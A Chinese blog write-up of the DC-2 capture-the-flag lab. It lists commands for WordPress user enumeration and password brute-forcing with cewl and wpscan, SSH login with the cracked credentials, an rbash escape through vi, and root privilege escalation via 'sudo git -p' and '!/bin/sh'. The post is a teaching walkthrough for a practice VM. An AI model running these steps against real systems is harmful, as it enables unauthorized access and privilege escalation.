Dc-2学习记录

一、信息收集

1、使用kscan获取靶机ip

 cd ~/Desktop
./kscan_linux_amd64 -t 192.168.209.0/24

在这里插入图片描述

2、访问靶机ip地址

(1)、修改dns

当你输入靶机ip时,网站会自动跳转成域名dc-2,也就是说即使你用ip访问,这个网站框架的设置就让你变成以域名访问这个网站,而我们这时候也会发现跳转访问失败。
在这里插入图片描述
这里就牵扯到dns(域名解析服务器)

域名服务器是指保存有该网络中所有主机的域名和对应IP地址,并具有将域名转换为IP地址功能的服务器。其中域名必须对应一个IP地址,而IP地址不一定有域名。

本机也有dns
我们这个是内网,在本机dns添加靶机ip以及域名即可在虚拟机里访问。

vim /etc/hosts

点击字母i进入编辑模式,将靶机ip和域名输入进去,然后按esc,输入:wq! 保存并退出。
在这里插入图片描述
访问dc-2

在这里插入图片描述

3、使用cewl工具收集密码

用cewl来获取密码,是爆破密码之类的,因为提示自己的密码字典可能无效,且有时没法获得所有密码,提示用其他的身份去登录。
cewl是通过爬行网站获取关键信息创建一个密码字典。

cewl http://dc-2/index.php/flag/ -w dict.txt

在这里插入图片描述

在这里插入图片描述

4、使用wpscan工具收集用户名

WPScan是Kali Linux默认自带的一款漏洞扫描工具。

在这里插入图片描述
但是遇到了更新失败问题
找到升级文件

dpkg -L wpscan | grep updater

在这里插入图片描述
编辑文件

vim /usr/share/rubygems-integration/all/gems/wpscan-3.8.22/lib/wpscan/db/updater.rb

在这里插入图片描述
升级成功

wpscan --update

在这里插入图片描述

sudo su

进入root权限

exit

切回普通权限

正式使用wpscan

wpscan --url http://dc-2/ -e u

在这里插入图片描述
发现用户名:admin、 tom、 jerry

我们将这三个用户名 写进一个文件里进行保存。

touch user.txt

在这里插入图片描述
找到这个文件进行编辑。
在这里插入图片描述

在这里插入图片描述

5、使用工具dirb工具扫描目录

dirb http://dc-2 

在这里插入图片描述
在这里插入图片描述

二、漏洞利用

(1)、爆破用户名和密码

wpscan --url http://dc-2/ -P dict.txt -U user.txt

在这里插入图片描述
在这里插入图片描述
爆出两个结果
jerry adipiscing
tom parturient

有了这个就去找登录:

在这里插入图片描述
发现首页并没有登录位置
访问:

http://dc-2/wp-admin/

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

(2)、端口利用

在这里插入图片描述

ssh tom@192.168.209.149 -p 7744
parturient

在这里插入图片描述

ls
cat flag3.txt //查看文件
ls /home/tom/usr/bin //查看可用命令

在这里插入图片描述

(3)、vi绕过

什么是rbash?:它与一般shell的区别在于会限制一些行为,让一些命令无法执行.
vi绕过

vi test
:set shell=/bin/sh
:shell

export -p //查看
export PATH="/usr/sbin:/usr/bin:/rbin:/bin"//修改
cat flag3.txt 

在这里插入图片描述

提示切换用户JERRY

切换用户并执行命令
su 用户名 -c “命令”

jerry adipiscing

su jerry
adipiscing

这个时候还需要切换路径

cd /home/jerry
ls
cat flag4.txt

在这里插入图片描述
在这里插入图片描述

三、git提权

sudo git -p//-p是分页的意思
!/bin/sh

whoami

在这里插入图片描述

cd ~
ls
cat final-flag.txt

在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值